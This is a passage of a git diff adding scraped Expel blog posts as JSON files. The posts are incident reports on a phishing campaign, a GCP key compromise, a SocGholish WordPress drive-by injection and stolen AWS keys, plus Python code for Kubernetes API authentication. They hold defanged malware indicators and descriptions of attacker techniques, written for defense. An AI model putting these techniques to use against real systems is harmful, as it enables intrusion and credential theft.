difference between receiving a malicious email and sharing your credentials or computer with an attacker. But identifying emails that are malicious, that no one interacted with, can quickly start to feel like busy work. And no one likes busy work. That doesn\u2019t change the fact that phishing attacks aren\u2019t going away. And attackers are getting smarter. Which is why we think it\u2019s good to know about the malicious emails you\u2019re getting, but the real goal is to quickly identify the malicious emails that lead to a compromise. We saw an opportunity to reconcile the need to have a pair of eyes on every email that is flagged as suspicious and giving our analysts meaningful work (and a chance to continue doing what they do best). \u201cAutomation is helpful, but at some point you need to have trained human eyes on these emails,\u201d \u2014 Expel customer, Lori Temples Vice President of IT Security and Business Continuity We think Expel for Phishing solves this problem. Our goal of creating this offering was to give our customer\u2019s security teams space to focus on other, more interesting tasks while we handle suspicious email submissions." +} \ No newline at end of file diff --git a/incident-report-how-a-phishing-campaign-revealed-bec.json b/incident-report-how-a-phishing-campaign-revealed-bec.json new file mode 100644 index 0000000000000000000000000000000000000000..d34a1ee5c3042e024e5a7ef239acbc4407b65de0 --- /dev/null +++ b/incident-report-how-a-phishing-campaign-revealed-bec.json @@ -0,0 +1,6 @@ +{ + "title": "Incident report: how a phishing campaign revealed BEC ...", + "url": "https://expel.com/blog/incident-report-how-a-phishing-campaign-revealed-bec-before-exploitation/", + "date": "Sep 7, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG Incident report: how a phishing campaign revealed BEC before exploitation Security operations \u00b7 6 MIN READ \u00b7 BEN SOLOWAY, TYLER WOOD, DAVID OVIATT AND HAROLD HARDING \u00b7 SEP 7, 2022 \u00b7 TAGS: MDR Recently, our SOC witnessed just how quickly attackers can start a phish fry with the spoils of a successful campaign. I don\u2019t think anyone will be too surprised by this, but hackers don\u2019t dilly-dally. When a phishing alert sounded just after midnight EST, it first seemed like a standard fare document-sharing phish. By the time the 89th and final submission was in the bucket, we knew a large-scale campaign had successfully hit a customer. In fact, we caught a suspicious login attempt from one of the compromised accounts shortly after we detected the submission of credentials to a phishing site. Let\u2019s walk through how we triaged the alert. But a campaign is nothing new\u2026 Credential harvesters are one of an attacker\u2019s bread and butter initial access tactics, so no surprise so far. An initial URL redirects to a fake login portal (often Microsoft-themed), and sandbox analysis often tells us where credentials get transmitted. But this particular campaign was really large. It hit users suddenly, and unlike so many others we see, it actually worked. A couple of users got tricked into submitting credentials, and not long after, we saw those credentials used in a login attempt. So why are we talking about a large, run-of-the-mill phishing campaign? Well, this one had some interesting features, including a browser extension, multiple senders, and different initial URLs. It\u2019s a good example of things going right during triage. And finally, it demonstrates the value of automation for enriching and expediting the process. How it went down The first alert was nothing surprising. The sender was from an external account and the body of the email was basically a single image stating that someone had shared a document for review. Our phishing team is a big fan of Ruxie\u2122, one of the robots we use to automate and enrich the details of a case. She\u2019s fantastic at parsing essential information for our analysts. This includes basics like sender addresses, reply-to\u2019s and return-paths, as well as embedded URLs in any given email body, whether in image references, hyperlinks, or text. She even runs API queries to pull back email reputation details and available Clearbit information on the sender organization. We use these pieces of information to orient ourselves to the story of each email, and then take action if needed. In this case, one of our team members reviewed the initial alert in our phishing queue, examined some of Ruxie\u2019s details, and immediately knew something was phishy. The analyst moved the alert into investigation status and started inspecting key features. If we determine malicious intent, we need to know where an attacker is directing victims, so that we can use logs to determine if any users mistakenly took the bait. We\u2019ll usually submit a URL to Ruxie, who integrates with a sandbox analyzer and further enriches the outcome information right from Workbench. Here, the analyst took the embedded URL and followed it to a fake document review page hosted on a Jotform domain. He clicked on the \u201creview document\u201d link and\u2026 that\u2019s where things ended. The fake login portal wouldn\u2019t manifest. There are tons of reasons this might happen \u30fc most often the companies hosting the phishing content get wise to it and shut the page down. But sometimes the attackers are savvy enough to use sandbox detection mechanisms, which make IOCs a little tougher to track down. Our analyst began to fiddle with the URL to see if he could get to the goods. Meanwhile, deep in the virtual SOC, more alerts started hitting the queue. Other analysts determined quickly that these were likely malicious emails. However, as part of our orienting process, they also recognized that the first analyst was working on a submission with the same sender domain, so these were likely related. After some quick discussion, we agreed that a campaign was under way and began adding the new alerts to the investigation. Ruxie quickly picked up on this and began adding the additional submissions, freeing the team up to focus on \u201chuman\u201d analysis tasks. Then another related submission hit the queue. A different sender domain, a slightly different embedded URL, nearly identical body\u2026 clearly the same campaign. At this point, the alerts were coming in pretty quickly, and our initial analyst was seeing several different flavors of the same email. Another analyst jumped in to help track down IOCs and investigate whether there was evidence of compromise, and this latest email was the ticket. As far as we can tell, the bulk of the initial submissions led to pages that had already been taken down by the content-hosting platforms. But this latest one was still live, and we were able to determine exactly where credentials were being sent \u4e00 an 18-day-old domain with a Canadian TLD. So we launched some Workbench queries to our customer\u2019s endpoint technology to see if any successful network connections had been made to the malicious URLs and domains. Unfortunately, we started returning some results. This doesn\u2019t always mean credentials are compromised. Often we\u2019ll see the recipient of a phish click a link and make it as far as the fake login portal before they realize the page is bogus and close out. They then submit the phish to us for analysis, and we\u2019ll see those connections, but there\u2019s no evidence of compromise. However, during our sandbox analysis, we were only observing post -method requests to the new domain, and those were only after credentials were submitted to the harvester. This means any traffic to the new domain observed in the customer environment is assumed to be the submission of credentials, and thus evidence of an active compromise. Submission of credentials to an attacker constitutes an incident requiring immediate action. Because our Workbench queries were returning results, we wanted to verify them by pivoting into the endpoint tech (in this case Defender ATP) before we promoted the investigation and woke the customer up. We submitted queries for the domain to the console, and\u2026 Shazam! We confirmed that two users had made successful network connections to the malicious domain via Chrome/Edge. An interesting twist on an old method Legitimate services are often employed in phishing attempts. It\u2019s nothing new to see a commonly used service in a malicious email to add a sense of legitimacy. Jotform, a legitimate file-sharing service, was abused during this attack, but the attackers used a trick we hadn\u2019t seen before. Jotform has a feature that adds an extension to the browser, and the purpose of the extension is for quick access to forms that can be managed through Jotform\u2019s premade templates. The attackers leveraged this feature to open the credential harvester in a separate window, which also acted as a bookmark to bring the user directly to the malicious login page. Threshold met. Incident created. Customer notified. At this point, the investigation was promoted to an incident and notifications were sent to the customer\u2019s security team automatically. Our focus shifted to getting remediations to them as quickly as possible, with the most important task being resetting credentials. We quickly blocked the malicious domains, removed the emails, and blocked the senders. We also clarified some of our findings with the customer\u2019s security team. Once the customer acknowledged our findings the incident was assigned over to them. The phishing team concluded its investigation and returned to triaging alerts as normal. Of course, this isn\u2019t quite where the story ended. A few hours later, an Azure AD Identity Protection alert fired for a risky sign-in associated with one of the compromised accounts from the phishing incident. An MDR analyst picked up the alert, and immediately realized that it was suspicious. Our analysts have a lot of options for enrichment and correlation, and a few quick searches revealed that the account was part of the phishing incident. The analyst informed the customer\u2019s security team of the login attempt and quickly received confirmation that credentials for the account had already been reset. However, for tracking purposes, and to allow the customer to test some internal automation, we elevated the login alert to an incident. Some takeaways It\u2019s essential that when we promote a campaign to an incident, the customer is notified immediately so they can respond. In this case, they did take action, and that\u2019s a win, especially since it may have prevented an attacker\u2019s successful login. More importantly it demonstrates redundancy of detection at its best. Our phishing team caught the successful credential harvesting and our MDR team caught the login attempt. If one had failed, the other would have caught it, and our customer would have been notified quickly either way. That\u2019s a win as well. We\u2019ll leave you with a few other thoughts for you to nosh on: If nothing else, this case serves as a reminder of just how quickly attackers can transition from stealing the keys to knocking on the front door. They aren\u2019t waiting around for your weekend to be over or for you to get back from the gym. They\u2019re going to take action quickly. Make sure your colleagues know what to look for, and make it easy for them to report. Educate your organization. 89 submissions to Expel doesn\u2019t reveal the full scope of the campaign. It only tells us how many users saw it, were sharp enough to recognize it as a phish, and then proactively submit it as malicious. If the submitters had simply ignored the email, the phishing team obviously couldn\u2019t have recognized the compromise. Quite honestly, 89 submissions for a phishing campaign? That\u2019s not bad. And yet\u2026 With a phishing campaign this size, you\u2019re more likely to see a weak link in the organization compromised. Don\u2019t ignore a large-scale campaign. Give those IOCs a second pass because an adversary only has to succeed once. These campaigns often have slightly different URLs and redirects, but transmit credentials to the same place. Try to understand the end-goal so you can stop them." +} \ No newline at end of file diff --git a/incident-report-spotting-an-attacker-in-gcp.json b/incident-report-spotting-an-attacker-in-gcp.json new file mode 100644 index 0000000000000000000000000000000000000000..5403af49f7438cad6e9b89891db3a38a59a1752f --- /dev/null +++ b/incident-report-spotting-an-attacker-in-gcp.json @@ -0,0 +1,6 @@ +{ + "title": "Incident report: Spotting an attacker in GCP", + "url": "https://expel.com/blog/incident-report-spotting-an-attacker-in-gcp/", + "date": "Jun 9, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG Incident report: Spotting an attacker in GCP Security operations \u00b7 3 MIN READ \u00b7 OSCAR DE LA ROSA, GIRISH MUKHI AND DAVID BLANTON \u00b7 JUN 9, 2022 \u00b7 TAGS: Cloud security / MDR TL;DR Common cloud misconfigurations and long-lived credentials were the root cause of all cloud incidents we identified in Q1. This post details a recent Google Cloud Platform (GCP) attack on one of our customers. Key takeaways: follow least privilege principles; regenerate keys periodically; and void putting credentials in code, the source tree, or repositories. One of the most common ways we see attackers gain unauthorized access to a customer\u2019s cloud environment is through publicly exposed credentials. In fact, common cloud misconfigurations and long-lived credentials were the root cause of 100% of incidents we identified in the cloud in the first quarter of 2022 (more on this in our new quarterly threat report ). Which makes it no surprise that this is exactly how an attacker gained access to a customer\u2019s Google Cloud Platform (GCP) environment in our most recent cloud incident spotted by our security operations center (SOC). Once the attacker acquired credentials to a GCP service account, they attempted to create a new service account key to maintain access using the Google SDK. While the scope of the incident was small since the GCP methods failed (score one for the good guys!), we still learned a lot. In this post, we\u2019ll walk through how we detected it, our investigative process, and some key takeaways that can help secure your GCP environment. Initial lead and detection methodology Our initial lead was an alert for an API call to the GCP method google.iam.admin.v1.createserviceaccountkey via SDK from an atypical source IP address. When we surfaced the alert to Workbench\u2122, our friendly bot, Ruxie\u2122, enriched the source IP address with geo-location and reputation information. Turned out, the source IP address was likely a TOR exit node with a history of scanning and brute-forcing. Simply put, an API call to the GCP method google.iam.admin.v1.createserviceaccountkey via SDK from this IP address is unusual. Ruxie also provided our SOC analysts with historical context on what other activities this service account performed in GCP within a 7 day timeframe (shown below). This information enabled our SOC analysts to further confirm that it\u2019s pretty unusual that a service account only performed the GCP methods google.iam.admin.v1.CreateServiceAccountKey and google.iam.admin.v1.EnableServiceAccount using the Google Cloud SDK from a TOR exit node. Based on this data from Ruxie, we believed these service account credentials were likely compromised \u2014 it was time to promote this alert to an incident. We notified the customer, escalated the activity to our SOC emergency on-call team, and began our response. Investigation and response in GCP Once we knew we had an incident on our hands, the first step was to provide the remediation action to disable the service account and reset credentials to our customer to stop the immediate threat. During this process, we answer our investigative questions: How was the GCP service account key compromised? What other GCP methods were called by this GCP service account, or its key, before and after the alerted activity? What other accounts or activities did we see from the TOR IP address in our customer\u2019s environment? To answer these questions, we ran searches across the cloud and domain environment and pulled a timeline of GCP audit logs. Timeline analysis of the GCP audit logs showed that the attacker was unable to successfully create a new service account key, or enable the service account, because the compromised service account didn\u2019t have the required Identity and Access Management (IAM) permissions. After the failed GCP methods, we didn\u2019t observe any more activity from the attacker. Throughout our investigation, we didn\u2019t observe any evidence to explain how the credentials were initially compromised. This led us to believe that the credentials were likely exposed publicly. The customer ended up confirming that they were committed to a public Github repo which allowed us to implement better resilience actions for all of our customers moving forward. Lessons and takeaways Based on our experience, here are some tips and lessons learned from this incident to help you secure your GCP environment: Ensure the principle of least privilege. This hinders attackers from leveraging compromised credentials to further perform post-exploitation in the cloud. For example, the attacker in this incident was unable to perform the GCP methods to create a new service account key because we followed this principle. Regenerate your keys periodically. It\u2019s good security hygiene to rotate keys and in the event that older credentials get compromised by an attacker. Avoid putting any credentials in code, the source tree, or repositories. This helps prevent credentials from being accidentally exposed. Github has a secret scanning service that identifies security keys that were committed, and Google has a security key detection feature that you can enable. Want to learn more about how Expel can help keep your GCP environment secure? Reach out anytime." +} \ No newline at end of file diff --git a/incident-report-spotting-socgholish-wordpress-injection.json b/incident-report-spotting-socgholish-wordpress-injection.json new file mode 100644 index 0000000000000000000000000000000000000000..4397acddcab5a4b09ebca6abddc1dbdd5942725b --- /dev/null +++ b/incident-report-spotting-socgholish-wordpress-injection.json @@ -0,0 +1,6 @@ +{ + "title": "Incident report: Spotting SocGholish WordPress injection", + "url": "https://expel.com/blog/incident-report-spotting-socgholish-wordpress-injection/", + "date": "Jul 22, 2021", + "contents": "Subscribe \u00d7 EXPEL BLOG Incident report: Spotting SocGholish WordPress injection Security operations \u00b7 5 MIN READ \u00b7 TYLER FORNES, RYAN GOTT, KYLE PELLETT AND EVAN REICHARD \u00b7 JUL 22, 2021 \u00b7 TAGS: Incident report / Managed detection and response Earlier this week, our SOC stopped a ransomware attack at a large software and staffing company. The attackers compromised the company\u2019s WordPress CMS and used the SocGholish framework to trigger a drive-by download of a Remote Access Tool (RAT) disguised as a Google Chrome update. In total, four hosts downloaded a malicious Zipped JScript file that was configured to deploy a RAT, but we were able to stop the attack before ransomware deployment and help the organization remediate its WordPress CMS. We\u2019ll walk you through what happened, how we caught it, and provide recommendations on how to secure your WordPress CMS. We also hope that this story is a good reminder of the power of asking the right investigative questions . How we spotted our initial lead Around 07:00 UTC ( that\u2019s 3:00 am ET), our SOC received an EDR alert for suspicious Windows Script Host (WSH) activity on one Windows 10 host. The TL;DR is an employee double clicked a Zipped JScript file named \u201cChrome.Update.js\u201d and EDR blocked execution. Here\u2019s what we were able to infer from our initial lead into the activity: This doesn\u2019t look like legitimate Google Chrome update activity Possible \u201cfake update\u201d activity delivered via Zipped JScript file The activity is only on this host, not prevalent, and unlikely to be a false positive The WSH process spawned from Windows Explorer, suggesting the employee double-clicked the JScript file versus part of an exploit-chain Initial lead: suspicious WSH process activity As part of our alert triage process, we did a quick check to make sure we weren\u2019t seeing the WSH activity anywhere else in the environment. We weren\u2019t. And EDR blocked the activity. Case closed? Nope. The quality of your SOC investigations is rooted in the questions you ask. There are two very important questions we needed to answer before calling it \u201ccase closed:\u201d What does the JScript file do? How did the Zipped JScript file get there? To figure out what the JScript file does, we grabbed a copy of the Zipped JScript file and submitted it to our internal sandbox (we use VMRay at Expel). The JScript file did the following at runtime: Contacted command-and-control servers hosted at [.]services[.]accountabilitypartner[.]com (195.189.96.41) and [.]drpease[.]com Opened an HTTP POST request for /pixel.png on TCP port 443 Delivery mechanism consistent with potential SocGholish framework activity Given this info, it\u2019s our opinion that \u201c/pixel.png\u201d is likely a second stage payload. We were unable to acquire a copy of \u201c/pixel.png\u201d for further analysis, but \u2026 Bottom line: it\u2019s bad. Now we needed to figure out how the Zipped JScript file got there. This is where the story gets interesting. How we investigated the SocGholish WordPress injection We needed to know how the Zipped JScript file got onto the host computer. It would\u2019ve been easy to assume, \u201cOkay, the Zipped JScript file was likely delivered via phishing and EDR is blocking the activity, so we\u2019ll block the C2 and move on.\u201d \u201c Not so fast, my friend. \u201d \u2013 Lee Corso Using EDR live response features, we acquired a copy of the employee\u2019s Google Chrome browser history as it could potentially contain evidence we needed to determine how the Zipped JScript file got there. The host in question is a Windows machine, so we grabbed a copy of C:Users\\AppDataLocalGoogleChromeUser DataDefaultHistory\u201d and reviewed it using internal tools. You can parse the History .db files using SQLite as well. Sure enough, Google Chrome history recorded that \u201cChrome.Update.js\u201d was downloaded after visiting a URL hosted on the company\u2019s WordPress CMS. The company\u2019s WordPress CMS was likely compromised, resulting in delivery of \u201cfake updates\u201d that deploy the SocGholish RAT. The company\u2019s WordPress CMS is publicly accessible, so anyone visiting the site could potentially be compromised. At this point in our investigation, we declared a critical incident, notified our customer, and in parallel escalated our on-call procedure to bring in additional cavalry to aid in the investigation. Our response and remediation efforts Google Chrome history contained evidence to suggest that the malicious Zipped JScript file was downloaded after visiting a webpage on the company\u2019s WordPress site. We let our customer know that there was evidence to suggest their WordPress site was compromised and to invoke their internal Incident Response plan. We also armed the customer with information about command-and-control servers and advised them to implement blocks. Adding to the excitement, as the late night hours turned into early morning hours on the East Coast, our SOC started to receive additional EDR alerts for deployment of the malicious Zipped JScript on additional Windows 10 hosts. EDR blocked that activity as well, but we needed to get a handle on the WordPress situation quickly. Anytime we\u2019d see a download of the Zipped JScript on a new host, we\u2019d repeat our process to establish how the file got there. In each case the Zipped JScript file was downloaded after visiting the company\u2019s WordPress site. But it turned out that multiple pages on the site were compromised, not just one. This context was super important. For situational awareness, we did a quick check and noticed the company was running an older version of WordPress, 5.5.3. We didn\u2019t have endpoint visibility into the WordPress server as it was hosted by a third party. If we did, we would have wanted to establish when and how the site was compromised. We inferred that the attacker likely exploited a vulnerability in a WordPress plugin or WordPress 5.5.3. We grabbed source code of any page that was recorded as triggering a drive-by-download and got to work. We almost immediately spotted a malicious inline script on every page that triggered a drive-by download: Malicious inline script deployed to multiple pages on the company\u2019s WordPress site We let the customer know about our findings and then turned our attention towards decoding and deobfuscating the script. Most of the obfuscation consisted of base64 encoded functions and strings. With the help of the Chrome DevTools Console, we stepped through the obfuscated script and eventually landed on the following: Decoded: malicious inline script deployed to multiple WordPress pages From the decoded script above, you\u2019ll see that to trigger the drive-by download, the user must be referred to the site (not referred from the same site) and be running Windows. The Zipped JScript was served from notify.aproposaussies[.]com (179.43.169.30). At the time of writing, only Kaspersky (1/87) has flagged the domain as malicious on VirusTotal. Everything is not fine. We now understand what\u2019s happening. At this point, the customer was already in the process of removing the malicious inline scripts and updating to the most recent version of WordPress. We did one last check of the environment to make sure no additional hosts downloaded the evil Zipped JScript file, checked to make sure that no hosts were talking to known C2 servers, and that no other malicious processes had executed. We asked the right questions and in doing so, figured out what happened. A quick recap: The attackers likely used the \u201c SocGholish \u201d framework to inject a malicious script into multiple pages on the company\u2019s WordPress site by exploiting a vulnerability in a WordPress plugin or WordPress 5.5.3. If an employee navigated to a compromised web page from a device running a Windows OS, an obfuscated inline script triggered a drive-by download of a ZIP file with an embedded Windows JScript file. The malicious JScript file was configured to enable remote access to infected hosts by communicating with command-and-control (C2) servers hosted on legitimate compromised infrastructure. That remote access is then typically used to deploy variants of the WASTEDLOCKER family of ransomware. Lessons learned and tips to prevent similar incidents WordPress security and its ecosystem has improved over the years, but it\u2019s still an attack vector. Keep up to date on patches, but also: Run trusted and well-known WordPress plugins. These tend to have had more scrutiny and more focus on security. Follow a WordPress hardening guide or install a WordPress security plug-in. There are many, so choose one that is right for you. Explore implementing or updating your website Content Security Policy to block malicious scripts. MFA everything and all users. Lock down your dev and staging instances, too (including adding MFA). You need to control the entire chain of the website, not just the final site. If a third party hosts your WordPress site, have all the contact info and recovery info needed in case of an incident. Run an IR tabletop exercise where the initial entry point is your WordPress site. Remember, the quality of your SOC investigations is rooted in the questions you ask. If we didn\u2019t answer, \u201cHow did it get there?\u201d we would have missed a huge finding that the company\u2019s WordPress site was compromised, resulting in drive-by downloads." +} \ No newline at end of file diff --git a/incident-report-stolen-aws-access-keys-expel.json b/incident-report-stolen-aws-access-keys-expel.json new file mode 100644 index 0000000000000000000000000000000000000000..57a047d9e28e4ebb5de8cd83f919e610805f25a5 --- /dev/null +++ b/incident-report-stolen-aws-access-keys-expel.json @@ -0,0 +1,6 @@ +{ + "title": "Incident report: stolen AWS access keys - Expel", + "url": "https://expel.com/blog/incident-report-stolen-aws-access-keys/", + "date": "Jan 6, 2023", + "contents": "Subscribe \u00d7 EXPEL BLOG Incident report: stolen AWS access keys Security operations \u00b7 5 MIN READ \u00b7 MYLES SATTERFIELD, TYLER WOOD, TEAUNA THOMPSON, TYLER COLLINS, IAN COOPER AND NATHAN SORREL \u00b7 JAN 6, 2023 \u00b7 TAGS: MDR What happens when attackers get their hands on a set of Amazon Web Services (AWS) access keys? Well, let\u2019s talk about it. In this post, we\u2019ll share how that scenario led to our security operations center (SOC), threat hunting, and detection engineering teams all working together on an incident. We love it when incidents teach us new things, helping strengthen our service delivery and keep our customer environments safe. We\u2019ll walk through the entire incident step-by-step to highlight not only what caught our attention, but how we capitalized on a situation that our customers don\u2019t often see. Initial lead and detection The initial alert lead indicated authentication with a suspicious user agent. The alert message\u30fc Observed Hacking Tool User agent \u2013 Kali Linux \u30fcsuggested that the user employed the Kali Linux operating system. Weird. A closer look at the user agent in question revealed that it was more specifically aws-cli/1.22.34 Python/3.9.11 Linux/5.15.0-kali3-amd64 botocore/1.27.84. Based on the contextual enrichment below, this AWS user account had not previously used a Kali Linux useragent within the previous two weeks. But what about the IP address associated with this activity? Ruxie\u2122\u2014our friendly bot responsible for triage\u2014automatically pulled some information for us. We then saw that the IP was allocated to a hosting provider other than AWS, Google, or Microsoft, and also that it wasn\u2019t located in a typical area for this customer. At this point, we\u2019re ready to call this an incident and let the customer know that we had something interesting on our hands. We issued remediation actions to reset credentials for the user and disable the long-term access key. Once we classified it as an incident, our next step was to see everything that the user, IP, and access key did, so we ran an AWS triage on all of them. Let\u2019s take a closer look at what Ruxie told us the user was doing. Using our AWS user enrichment workflow, we can quickly identify which IPs the user usually performs activity with and any interesting or failed AWS API calls. Here we saw three API calls: (two) list users, and one GetSendQuota (our threat hunting team will tell us why this is important). All were denied and all came from the same access key, but different user agents. Interesting. Using our leads, we scoped additional activity in the compromised environment. As noted earlier, this led to the discovery of additional AWS IAM accounts/access keys. Seven to be exact. We repeated our remediation actions for those accounts/keys. Too long; didn\u2019t read (TL;DR) The attacker gained access to the customer environment through the use of stolen long-term access keys. Scoping surrounding activity for the AWS account, we saw that the attacker was attempting to use seven different access keys and accounts. How were the AWS keys compromised? During the initial triage, we didn\u2019t find evidence of any exploited services. We turned to open-source intelligence gathering and performed some simple Google searches to see if there were any obvious candidates for exposure. Using patterns observed in the affected IAM account names, we came across a publicly exposed Postman server with access key credentials stored in the project\u2019s variables. Threat hunting While examining what was known about the newly created incident, we noticed an event type we didn\u2019t recognize: GetSendQuota. It\u2019s not one an attacker typically uses, and anomalies are interesting to hunters, so we began running queries and doing some research. What does \u2018GetSendQuota\u2019 do? Who else is running that event type? Does this organization use this event commonly? Did anything else stick out as atypical? Some Googling revealed that GetSendQuota was an Amazon email service feature that \u201cprovides the sending limits for the Amazon SES account.\u201d In scoping the customer\u2019s historical activity, we saw that this event was called very rarely and only by a confined set of users. One of them we could eliminate easily, as it was a service account running automated tasks. The remaining users were interesting, and I noticed several error messages all interacting with the same account. Taking the access_key_id for the initial lead, we looked up what else it did. Most of that user\u2019s activity was Amazon SES-related (around 95%) and we were able to find other events that stuck out as unusual. \u201cUpdateAccountSendingEnabled,\u201d specifically, seemed interesting, as it was called several times (but not excessively, and it seemed to toggle a useful service on or off). Documentation indicated that it \u201cenables or disables email sending across your entire Amazon SES account in the current AWS region.\u201d Isolating this event type in the whole environment confirmed that only six users ever employed this event type. All six overlapped with the group of users from the previous query. This gave us high confidence that all six were compromised. Subsequent queries using the observed source IP addresses for the compromised accounts led us to one more owned account. Interestingly, as we are always researching threat hunt methodologies, we ran a separate hunt against this customer\u2019s data looking for common \u201cgroupings\u201d of attacker events. That hunt didn\u2019t suggest that these accounts were suspicious. It was a useful exercise because it showed that these attackers were consistent in their behavior. But they weren\u2019t doing things the way other bad actors did. For this attack, event prevalence and feature overlap were key to isolating all compromised accounts. This attacker\u2019s focus on email infrastructure was noteworthy and has led us to compile some of these event types into a new \u201cemail event buckets\u201d to hunt on in the future. Detection opportunities for stolen access keys This incident presented a unique scenario to detect against. Hopefully, all defenders in AWS are concerned about attackers stealing an access key\u30fcespecially a long-term access key. This is what keeps us defenders up at night, and is the reason digital watering holes like GitHub have warnings about making resources available to the public. The above is quite a standard scenario. However, when attackers gain access to multiple access keys, their behavior may change a little bit, giving blue teams another behavior to key on. When an attacker scores some trust material like an access key, or lands on a box (gains access to a new device) which they\u2019re unfamiliar with, they\u2019re likely to perform some enumeration to figure out what powers they\u2019ve gained. Enumeration of this type can be difficult to detect due to high volume events that are of little concern. Sometimes administrators and infrastructure tools like CloudFormation perform enumeration API calls multiple times a day. In this incident, we noticed the attacker performing the same enumeration activity from the same sources, with multiple access keys. Hunting through our customers\u2019 environments, we found that enumeration of multiple access keys is rare. Specifically, the attacker used the API GetCallerIdentity using multiple access keys and from the same IP. GetCallerIdentity is similar to the bash command whoami and gives the attacker information about where they have landed. Since it rarely happens, is it even worth it to build a detection? Yes, absolutely, because stolen access keys are among the top vectors for initial access into an AWS environment. Key Takeaways Remediation: Deactivate the access key associated with the IAM account Using an abundance of caution, reset the AWS console password associated with the IAM account (recommended) Block the source IP address (recommended) Detections: AWS Access Key Enumeration: multiple recon API calls (GetCallerIdentity) on multiple AWS access keys from the same source IP Threat hunting: Attackers commonly have their own playbook and will keep working it. We can use that to our advantage by looking for similar activity elsewhere (or being executed by different users). We can also use this knowledge to do threat hunting audits long after the original event has been remediated. If you missed some persistence mechanism that was originally established by the attacker, you will be able to see it later if you keep looking for that playbook of events. Common activity is our best friend. Any single environment will have patterns that line up with the daily activity of its admins and users. Attackers won\u2019t know these patterns and will stand out. Knowing your organization\u2019s patterns will help you see attackers. Research and humility are key. Not all attackers are the same. Not all of them will utilize \u201cGetSendQuota.\u201d It\u2019s easy to get complacent and think you know what an attacker might do\u2026only to observe an attack unlike any you had seen before." +} \ No newline at end of file diff --git a/instrumenting-the-big-three-managed-kubernetes.json b/instrumenting-the-big-three-managed-kubernetes.json new file mode 100644 index 0000000000000000000000000000000000000000..189e798d8337b918d6fa3eabba28eda9b00c7340 --- /dev/null +++ b/instrumenting-the-big-three-managed-kubernetes.json @@ -0,0 +1,6 @@ +{ + "title": "Instrumenting the \u201cbig three\u201d managed Kubernetes ...", + "url": "https://expel.com/blog/instrumenting-the-big-three-managed-kubernetes-offerings-with-python/", + "date": "Apr 13, 2023", + "contents": "Subscribe \u00d7 EXPEL BLOG Instrumenting the \u201cbig three\u201d managed Kubernetes offerings with Python Engineering \u00b7 8 MIN READ \u00b7 DAN WHALEN \u00b7 APR 13, 2023 \u00b7 TAGS: Tech tools We\u2019ve written a lot about Kubernetes (k8s) in recent months, particularly on the need for improved security visibility . And we recently released a (first-to-market!) MDR for Kubernetes offering . Part of this journey involved overcoming a key technical challenge: what\u2019s the best way to securely access the Kubernetes API for managed offerings like Google Kubernetes Engine (GKE), Amazon Elastic Kubernetes Service (EKS), and Azure Kubernetes Service (AKS)? Each cloud provider has its own middleware, best practices, and hurdles to clear. Figuring it all out can be quite the challenge\u2014you can end up neck-deep in documentation, some of which is outdated or inaccurate. In this post, we\u2019ll share what we\u2019ve learned along the way and give you the tools you need to do it yourself. Why do this? This is an oversimplification, but Kubernetes is really just one big, robust, well-conceived API. It allows orchestration of workloads, but can also be employed to understand what\u2019s going on in the environment. You\u2019ve probably used (or heard of) kubectl, right? It\u2019s an incredibly useful tool, a client that interfaces with k8s APIs. If you can do it in kubectl, you could also go directly to the API to get the same information (and more). Using Kubernetes APIs opens up a plethora of use cases from automating inventory of resources, reliability monitoring, security policy checks, and even automating some detection and response activities. But to perform any of these activities you need to securely authenticate to your managed k8s provider. In the following sections, we\u2019ll walk you through how to do that securely for Google Cloud Platform (GCP), Microsoft Azure, and Amazon Web Services (AWS). If that sounds interesting, let\u2019s get started. Before you begin Before we get into the tech details, it\u2019s important to call out a few requirements. Requirements Follow security best practices Use established patterns for each cloud provider Use existing vendor packages where possible (don\u2019t reinvent the wheel) Note We\u2019re going to focus specifically on accessing the Kubernetes API for EKS, GKE, and AKS. We\u2019re not going to cover getting network access to the Kubernetes API\u2014there are too many permutations to cover, so we\u2019ll assume you have network connectivity, whether it\u2019s to a private cluster or a cluster with a public endpoint ( maybe don\u2019t do that, though ). Warning The Python recipes we\u2019re sharing below are just examples. Use them for inspiration\u2014 don\u2019t copy and paste them into production . What we\u2019re solving for Given cloud identity and access management (IAM) credentials for GCP, Azure, and AWS, and network connectivity to a Kubernetes cluster, how can we connect to the API in a way that satisfies all of our requirements? Each cloud infrastructure provider has its own managed Kubernetes offering and access patterns have some slight differences. At a high level, what we want to accomplish looks something like this: Early on we made a key design choice: we\u2019d strongly prefer to only deal with cloud IAM credentials. Sure, technically we could create service account tokens in Kubernetes natively and use them to access the API, but this feels wrong for a few reasons: Cutting service account tokens encourages long-lived credentials as a dark pattern, and we\u2019d like to avoid this for security reasons. Using k8s service accounts means rules-based access control (RBAC) authorization must be managed entirely in Kubernetes with roles and role bindings . We\u2019d like to avoid that wherever possible as it\u2019s not very accessible, is easy to misconfigure, and can be tough to audit. Managed k8s services have built-in authorization middleware we can use. Given that design, let\u2019s take a look at the recipes for GKE, AKS, and EKS. Connecting to Google Kubernetes Engine (GKE) How it works The recipe below uses a service account in GCP with a custom IAM role to access the Kubernetes API. In our view, Google has done a great job of making this simple and easy. The recipe takes advantage of existing Google SDKs to talk to the GCP control plane to get cluster details and an OAuth token for API access. Prerequisites A GCP service account (not a Kubernetes service account) with generated JSON credentials Service account must be assigned IAM permissions to get cluster details and read data in Kubernetes (this can be adjusted based on your use case) Network access to your cluster\u2019s API endpoint Python example import logging import google.auth.transport.requests from google.cloud.container_v1 import ClusterManagerClient from google.cloud.container_v1 import GetClusterRequest from google.oauth2 import service_account import kubernetes.client # Update this to your cluster ID CLUSTER_ID = \u201cprojects/kubernetes-integration-318317/locations/us-east1-b/clusters/gke-integration-test\u201d # Update this to your service account credentials file GOOGLE_CREDENTIALS = \u2018google_credentials.json\u2019 logging.info( \u201cRetrieving cluster details\u201d , cluster_id=CLUSTER_ID) credentials = service_account.Credentials.from_service_account_file(GOOGLE_CREDENTIALS) req = GetClusterRequest(name=CLUSTER_ID) cluster_manager_client = ClusterManagerClient(credentials=credentials) cluster = cluster_manager_client.get_cluster(req) logging.info( \u201cGot cluster endpoint address\u201d , endpoint=cluster.endpoint) logging.info( \u201cRequesting an OAuth token from GCP\u2026\u201d ) kubeconfig_creds = credentials.with_scopes( [ \u2018https://www.googleapis.com/auth/cloud-platform\u2019 , \u2018https://www.googleapis.com/auth/userinfo.email\u2019 , ] , ) auth_req = google.auth.transport.requests.Request() kubeconfig_creds.refresh(auth_req) logging.info( \u2018Retrieved OAuth token for K8s API\u2019 ) # Build endpoint string and 